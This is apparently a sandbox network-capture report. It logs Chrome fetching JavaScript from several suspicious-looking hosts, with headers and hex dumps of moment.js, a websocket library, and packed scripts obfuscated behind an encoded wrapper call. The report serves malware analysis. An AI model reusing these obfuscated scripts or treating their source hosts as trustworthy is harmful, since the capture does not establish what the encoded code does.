                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:00 UTC631INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:59 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 18632
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:59:00 GMT
                                                                                                                                                          ETag: "6645cad4-48c8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[14],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,13],EU-FRA-paris-GLOBAL1-CACHE15[5],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2524005
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9f7e3b12b91a87813045466611b1061f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 67995
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:00 UTC15753INData Raw: 61 34 76 6a 65 75 75 65 28 22 49 51 4d 77 72 67 64 67 78 67 4c 67 6c 67 65 77 67 43 67 51 53 67 4e 34 44 63 43 47 41 6e 41 41 67 47 63 42 65 41 64 7a 67 67 42 4d 45 79 41 36 4d 67 55 77 43 4d 41 48 48 4b 41 61 77 43 6b 69 6c 57 41 33 42 57 71 30 47 4c 64 6c 31 37 38 53 34 61 50 43 54 49 59 41 47 67 43 32 53 67 46 61 59 51 43 50 4d 6c 79 46 57 53 75 45 72 78 4b 6f 4a 41 41 78 4b 41 4e 69 51 44 61 41 58 51 46 51 41 50 44 44 72 58 47 45 41 4f 59 77 41 46 73 34 41 31 49 46 6f 63 43 51 77 64 6c 41 4f 53 6f 78 32 63 41 34 41 5a 41 6e 57 64 4b 78 67 52 48 37 49 73 66 46 32 46 67 35 6f 4d 58 45 4f 6c 67 4c 61 75 71 77 45 6c 41 51 71 61 41 44 79 7a 4f 71 4d 73 4b 6c 34 43 44 42 74 41 4a 36 73 6a 48 52 2b 4f 45 53 31 5a 42 41 41 43 71 33 64 65 44 41 64 64 46 41 34
                                                                                                                                                          Data Ascii: a4vjeuue("IQMwrgdgxgLglgewgCgQSgN4DcCGAnAAgGcBeAdzggBMEyA6MgUwCMAHHKAawCkilWA3BWq0GLdl178S4aPCTIYAGgC2SgFaYQCPMlyFWSuErxKoJAAxKANiQDaAXQFQAPDDrXGEAOYwAFs4A1IFocCQwdlAOSox2cA4AZAnWdKxgRH7IsfF2Fg5oMXEOlgLauqwElAQqaADyzOqMsKl4CDBtAJ6sjHR+OES1ZBAACq3deDAddFA4
                                                                                                                                                          2024-06-09 22:41:00 UTC2879INData Raw: 79 76 43 39 4b 68 65 44 58 55 46 56 4c 7a 63 39 6d 2f 51 70 4d 76 62 58 69 31 35 75 4c 6c 64 78 65 78 37 70 33 6d 62 79 35 2b 6a 46 59 70 69 76 7a 72 72 46 42 5a 2f 64 65 42 6c 41 76 41 43 51 6c 50 36 2b 49 2f 58 66 2f 6b 49 62 78 62 30 47 39 39 4b 63 66 79 76 46 61 66 56 49 65 4a 65 2b 56 6a 47 55 69 6e 6a 37 78 57 6c 54 4b 48 69 37 76 6d 5a 41 2b 32 31 35 56 4c 73 6f 7a 76 57 6e 68 48 49 6a 36 75 2f 30 34 50 55 6e 6d 59 72 2f 71 55 52 38 57 65 63 63 50 4b 48 4c 33 46 2f 4e 4c 34 2b 43 76 63 44 34 6e 31 6a 35 4e 53 38 70 63 66 71 5a 42 4d 6c 31 2f 4f 4d 68 6b 45 79 6f 58 74 6e 44 65 4b 63 2f 37 65 58 50 50 70 5a 6e 32 65 34 6f 51 65 70 6b 79 58 58 34 4d 72 4b 6e 73 2b 35 66 47 48 2f 50 30 7a 39 65 4b 5a 53 72 75 41 66 66 41 38 6c 46 6d 39 35 2f 50 69 68
                                                                                                                                                          Data Ascii: yvC9KheDXUFVLzc9m/QpMvbXi15uLldxex7p3mby5+jFYpivzrrFBZ/deBlAvACQlP6+I/Xf/kIbxb0G99KcfyvFafVIeJe+VjGUinj7xWlTKHi7vmZA+215VLsozvWnhHIj6u/04PUnmYr/qUR8WeccPKHL3F/NL4+CvcD4n1j5NS8pcfqZBMl1/OMhkEyoXtnDeKc/7eXPPpZn2e4oQepkyXX4MrKns+5fGH/P0z9eKZSruAffA8lFm95/Pih


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          210192.168.2.549955183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:59 UTC547OUTGET /ftl/commonPage/js/websocket/Comet.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:00 UTC706INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 17340
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-04-13
                                                                                                                                                          ETag: "60f60fb5-43bc"
                                                                                                                                                          Date: Thu, 06 Jun 2024 10:05:50 GMT
                                                                                                                                                          Last-Modified: Mon, 19 Jul 2021 23:50:13 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 10:05:50 GMT
                                                                                                                                                          Age: 304510
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;huzmp04:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-HUZ-MP-04-13
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-13
                                                                                                                                                          X-Cdn-Request-ID: 8f7db488e6062e109a996e780ffda6c3
                                                                                                                                                          2024-06-09 22:41:00 UTC15678INData Raw: 2f 2a 2a 0a 20 2a 0a 20 2a 2f 0a 66 75 6e 63 74 69 6f 6e 20 4d 53 69 74 65 43 6f 6d 65 74 28 29 20 7b 0a 7d 0a 0a 4d 53 69 74 65 43 6f 6d 65 74 2e 70 72 6f 74 6f 74 79 70 65 20 3d 20 7b 0a 0a 20 20 20 20 2f 2a 2a 20 e8 af b7 e6 b1 82 e5 8f 82 e6 95 b0 e5 90 8d ef bc 9a e5 90 8c e6 ad a5 20 2a 2f 0a 20 20 20 20 53 59 4e 43 48 52 4f 4e 49 5a 45 5f 4b 45 59 3a 20 22 5f 53 5f 43 4f 4d 45 54 22 2c 0a 20 20 20 20 2f 2a 2a 20 e5 90 8c e6 ad a5 e5 80 bc ef bc 9a e5 88 9b e5 bb ba e8 bf 9e e6 8e a5 20 2a 2f 0a 20 20 20 20 43 4f 4e 4e 45 43 54 49 4f 4e 5f 56 41 4c 55 45 3a 20 22 43 22 2c 0a 20 20 20 20 2f 2a 2a 20 e5 90 8c e6 ad a5 e5 80 bc ef bc 9a e6 96 ad e5 bc 80 e8 bf 9e e6 8e a5 20 2a 2f 0a 20 20 20 20 44 49 53 43 4f 4e 4e 45 43 54 5f 56 41 4c 55 45 3a 20 22
                                                                                                                                                          Data Ascii: /** * */function MSiteComet() {}MSiteComet.prototype = { /** */ SYNCHRONIZE_KEY: "_S_COMET", /** */ CONNECTION_VALUE: "C", /** */ DISCONNECT_VALUE: "
                                                                                                                                                          2024-06-09 22:41:00 UTC1662INData Raw: 63 61 6c 6c 65 72 20 3a 20 6e 75 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 6c 6c 62 61 63 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 2e 63 61 6c 6c 28 63 61 6c 6c 65 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 6f 6e 57 65 62 73 6f 63 6b 65 74 4f 70 65 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 2f 2f 20 63 75 72 72 65 6e 74 20 70 6f 73 74 69 6f 6e 20 22 74 68 69 73 22 20 3d 20 77 65 62 73 6f 63 6b 65 74 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 54 68 69 73 20 3d 20 74 68 69 73 2e 6f 75 74 54 68 69
                                                                                                                                                          Data Ascii: caller : null; if (callback) { callback.call(caller); } } }); }, onWebsocketOpen: function () { // current postion "this" = websocket var outThis = this.outThi


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          211192.168.2.549956183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC539OUTGET /ftl/commonPage/js/moment.js HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:00 UTC705INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 117433
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-QD-MP-02-42
                                                                                                                                                          ETag: "64b633ca-1cab9"
                                                                                                                                                          Date: Thu, 06 Jun 2024 12:05:09 GMT
                                                                                                                                                          Last-Modified: Tue, 18 Jul 2023 06:40:10 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 12:05:09 GMT
                                                                                                                                                          Age: 297351
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;qdmp02:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-QD-MP-02-42
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-24
                                                                                                                                                          X-Cdn-Request-ID: c395b4bc54c26e7dfdb0cbaeaad32241
                                                                                                                                                          2024-06-09 22:41:00 UTC15679INData Raw: 2f 2f 21 20 6d 6f 6d 65 6e 74 2e 6a 73 0a 2f 2f 21 20 76 65 72 73 69 6f 6e 20 3a 20 32 2e 31 30 2e 33 0a 2f 2f 21 20 61 75 74 68 6f 72 73 20 3a 20 54 69 6d 20 57 6f 6f 64 2c 20 49 73 6b 72 65 6e 20 43 68 65 72 6e 65 76 2c 20 4d 6f 6d 65 6e 74 2e 6a 73 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 2f 2f 21 20 6c 69 63 65 6e 73 65 20 3a 20 4d 49 54 0a 2f 2f 21 20 6d 6f 6d 65 6e 74 6a 73 2e 63 6f 6d 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62 61 6c 2c 20 66 61 63 74 6f 72 79 29 20 7b 0a 20 20 20 20 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 20 26 26 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 66 61 63 74 6f 72 79
                                                                                                                                                          Data Ascii: //! moment.js//! version : 2.10.3//! authors : Tim Wood, Iskren Chernev, Moment.js contributors//! license : MIT//! momentjs.com(function (global, factory) { typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 22 63 75 73 74 6f 6d 52 61 6e 67 65 4c 61 62 65 6c 22 3a 20 22 6d 65 6e 79 65 73 75 61 69 6b 61 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 72 73 74 44 61 79 22 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 65 65 6b 64 61 79 73 3a 20 5b 22 4d 69 6e 67 67 75 22 2c 20 22 53 65 6e 69 6e 22 2c 20 22 53 65 6c 61 73 61 22 2c 20 22 52 61 62 75 22 2c 20 22 4b 61 6d 69 73 22 2c 20 22 4a 75 6d 61 74 22 2c 20 22 53 61 62 74 75 22 2c 20 22 4d 69 6e 67 67 75 22 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 65 65 6b 64 61 79 73 53 68 6f 72 74 3a 20 5b 22 4d 69 6e 67 67 75 22 2c 20 22 53 65 6e 69 6e 22 2c 20 22 53 65 6c 61 73 61 22 2c 20 22 52 61 62 75 22 2c 20 22 4b 61 6d 69 73 22 2c 20 22 4a 75 6d 61 74 22 2c 20
                                                                                                                                                          Data Ascii: "customRangeLabel": "menyesuaikan", "firstDay": 1, weekdays: ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu", "Minggu"], weekdaysShort: ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat",
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 67 2e 5f 77 20 3d 20 63 6f 6e 66 69 67 2e 5f 77 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 28 69 6e 70 75 74 2c 20 63 6f 6e 66 69 67 2e 5f 77 2c 20 63 6f 6e 66 69 67 2c 20 74 6f 6b 65 6e 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 64 64 54 69 6d 65 54 6f 41 72 72 61 79 46 72 6f 6d 54 6f 6b 65 6e 28 74 6f 6b 65 6e 2c 20 69 6e 70 75 74 2c 20 63 6f 6e 66 69 67 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 69 6e 70 75 74 20 21 3d 20 6e 75 6c 6c 20 26 26 20 68 61 73 4f 77 6e 50 72 6f 70 28 74 6f 6b 65 6e 73 2c 20 74 6f 6b 65 6e 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 6b 65 6e 73 5b 74 6f 6b 65 6e 5d 28 69 6e 70 75 74 2c 20 63 6f 6e 66 69
                                                                                                                                                          Data Ascii: g._w = config._w || {}; callback(input, config._w, config, token); }); } function addTimeToArrayFromToken(token, input, config) { if (input != null && hasOwnProp(tokens, token)) { tokens[token](input, confi
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 6e 6f 74 20 64 65 66 61 75 6c 74 65 64 2c 20 69 6e 63 6c 75 64 69 6e 67 20 74 69 6d 65 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 3b 20 69 20 3c 20 37 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 66 69 67 2e 5f 61 5b 69 5d 20 3d 20 69 6e 70 75 74 5b 69 5d 20 3d 20 28 63 6f 6e 66 69 67 2e 5f 61 5b 69 5d 20 3d 3d 20 6e 75 6c 6c 29 20 3f 20 28 69 20 3d 3d 3d 20 32 20 3f 20 31 20 3a 20 30 29 20 3a 20 63 6f 6e 66 69 67 2e 5f 61 5b 69 5d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 43 68 65 63 6b 20 66 6f 72 20 32 34 3a 30 30 3a 30 30 2e 30 30 30 0a 20 20 20 20 20 20 20 20 69 66 20 28 63 6f 6e 66 69 67 2e 5f 61 5b 48 4f 55 52 5d 20 3d 3d 3d 20 32 34 20 26 26 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                          Data Ascii: not defaulted, including time for (; i < 7; i++) { config._a[i] = input[i] = (config._a[i] == null) ? (i === 2 ? 1 : 0) : config._a[i]; } // Check for 24:00:00.000 if (config._a[HOUR] === 24 &&
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 3d 20 69 6e 70 75 74 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 6b 65 65 70 4c 6f 63 61 6c 54 69 6d 65 20 7c 7c 20 74 68 69 73 2e 5f 63 68 61 6e 67 65 49 6e 50 72 6f 67 72 65 73 73 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 64 64 5f 73 75 62 74 72 61 63 74 5f 5f 61 64 64 53 75 62 74 72 61 63 74 28 74 68 69 73 2c 20 63 72 65 61 74 65 5f 5f 63 72 65 61 74 65 44 75 72 61 74 69 6f 6e 28 69 6e 70 75 74 20 2d 20 6f 66 66 73 65 74 2c 20 27 6d 27 29 2c 20 31 2c 20 66 61 6c 73 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 21 74 68 69 73 2e 5f 63 68 61 6e 67 65 49 6e 50 72 6f 67 72 65 73 73 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                          Data Ascii: = input) { if (!keepLocalTime || this._changeInProgress) { add_subtract__addSubtract(this, create__createDuration(input - offset, 'm'), 1, false); } else if (!this._changeInProgress) {
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 6c 69 64 41 74 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 67 65 74 50 61 72 73 69 6e 67 46 6c 61 67 73 28 74 68 69 73 29 2e 6f 76 65 72 66 6c 6f 77 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 61 64 64 46 6f 72 6d 61 74 54 6f 6b 65 6e 28 30 2c 20 5b 27 67 67 27 2c 20 32 5d 2c 20 30 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 77 65 65 6b 59 65 61 72 28 29 20 25 20 31 30 30 3b 0a 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 61 64 64 46 6f 72 6d 61 74 54 6f 6b 65 6e 28 30 2c 20 5b 27 47 47 27 2c 20 32 5d 2c 20 30 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 6f 57 65 65 6b 59 65 61 72 28 29 20 25 20 31 30 30 3b 0a 20 20
                                                                                                                                                          Data Ascii: lidAt () { return getParsingFlags(this).overflow; } addFormatToken(0, ['gg', 2], 0, function () { return this.weekYear() % 100; }); addFormatToken(0, ['GG', 2], 0, function () { return this.isoWeekYear() % 100;
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 44 44 44 20 5b 61 74 5d 20 4c 54 27 2c 0a 20 20 20 20 20 20 20 20 6c 61 73 74 44 61 79 20 3a 20 27 5b 59 65 73 74 65 72 64 61 79 20 61 74 5d 20 4c 54 27 2c 0a 20 20 20 20 20 20 20 20 6c 61 73 74 57 65 65 6b 20 3a 20 27 5b 4c 61 73 74 5d 20 44 44 44 44 20 5b 61 74 5d 20 4c 54 27 2c 0a 20 20 20 20 20 20 20 20 73 61 6d 65 45 6c 73 65 20 3a 20 27 4c 27 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6c 6f 63 61 6c 65 5f 63 61 6c 65 6e 64 61 72 5f 5f 63 61 6c 65 6e 64 61 72 20 28 6b 65 79 2c 20 6d 6f 6d 2c 20 6e 6f 77 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 74 68 69 73 2e 5f 63 61 6c 65 6e 64 61 72 5b 6b 65 79 5d 3b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6f 75 74 70 75 74 20 3d
                                                                                                                                                          Data Ascii: DDD [at] LT', lastDay : '[Yesterday at] LT', lastWeek : '[Last] DDDD [at] LT', sameElse : 'L' }; function locale_calendar__calendar (key, mom, now) { var output = this._calendar[key]; return typeof output =
                                                                                                                                                          2024-06-09 22:41:00 UTC3450INData Raw: 72 6f 74 6f 74 79 70 65 5f 5f 70 72 6f 74 6f 2e 61 73 57 65 65 6b 73 20 20 20 20 20 20 20 20 3d 20 61 73 57 65 65 6b 73 3b 0a 20 20 20 20 64 75 72 61 74 69 6f 6e 5f 70 72 6f 74 6f 74 79 70 65 5f 5f 70 72 6f 74 6f 2e 61 73 4d 6f 6e 74 68 73 20 20 20 20 20 20 20 3d 20 61 73 4d 6f 6e 74 68 73 3b 0a 20 20 20 20 64 75 72 61 74 69 6f 6e 5f 70 72 6f 74 6f 74 79 70 65 5f 5f 70 72 6f 74 6f 2e 61 73 59 65 61 72 73 20 20 20 20 20 20 20 20 3d 20 61 73 59 65 61 72 73 3b 0a 20 20 20 20 64 75 72 61 74 69 6f 6e 5f 70 72 6f 74 6f 74 79 70 65 5f 5f 70 72 6f 74 6f 2e 76 61 6c 75 65 4f 66 20 20 20 20 20 20 20 20 3d 20 64 75 72 61 74 69 6f 6e 5f 61 73 5f 5f 76 61 6c 75 65 4f 66 3b 0a 20 20 20 20 64 75 72 61 74 69 6f 6e 5f 70 72 6f 74 6f 74 79 70 65 5f 5f 70 72 6f 74 6f 2e 5f
                                                                                                                                                          Data Ascii: rototype__proto.asWeeks = asWeeks; duration_prototype__proto.asMonths = asMonths; duration_prototype__proto.asYears = asYears; duration_prototype__proto.valueOf = duration_as__valueOf; duration_prototype__proto._


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          212192.168.2.54995823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC541OUTGET /pc/240516-03/static/js/vendor.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:00 UTC630INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:00 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 151324
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:02:59 GMT
                                                                                                                                                          ETag: "6645cbc3-24f1c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[4],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE22[7],EU-FRA-paris-GLOBAL1-CACHE7[0,TCP_HIT,4],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2524004
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4bb16973aa51abdacd85e3b80e877af0
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 67996
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:00 UTC15754INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 4c 67 54 67 44 59 42 64 41 47 67 47 38 41 69 41 61 67 43 59 61 6b 71 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 7a 63 79 49 4d 6d 67 43 55 31 64 6b 68 41 41 43 4a 4e 77 42 4f 76 48 6c 51 44 63 41 4e 79 67 4b 5a 43 67 4c 78 70 4d 56 41 43 4a 49 41 72 41 41 55 71 59 73 72 33 32 47 41 4c 41 51 43 4f 41 4c 79 75 59 41 68 41 41 59 78 71 68 5a 67 55 41 4f 6e 4d 79 4b 67 42 6c 52 56 34 30 41 48 4d 71 53 69 68 75 4e 6b 34 65 66 67 4e 75 43 51 55 51 62 6e 59 46 4e 42 6c 65 51 51 41 4c 58 69 51 79 64 49 42 66 63 72 46 79 30 4a 6f 41 59 51 42 5a 41 68 59 4f 4c 6a 34 42 49 52 46 78 53 57 6b 35 53 4a 55 4e 4c 52 30 37 59 7a 4e 4c 61 31 73 44 4b 68 52
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgTgDYBdAGgG8AiAagCYakqAuAMwFc0YAXAS3UzcyIMmgCU1dkhAACJNwBOvHlQDcANygKZCgLxpMVACJIArAAUqYsr32GALAQCOALyuYAhAAYxqhZgUAOnMyKgBlRV40AHMqSihuNk4efgNuCQUQbnYFNBleQQALXiQydIBfcrFy0JoAYQBZAhYOLj4BIRFxSWk5SJUNLR07YzNLa1sDKhR
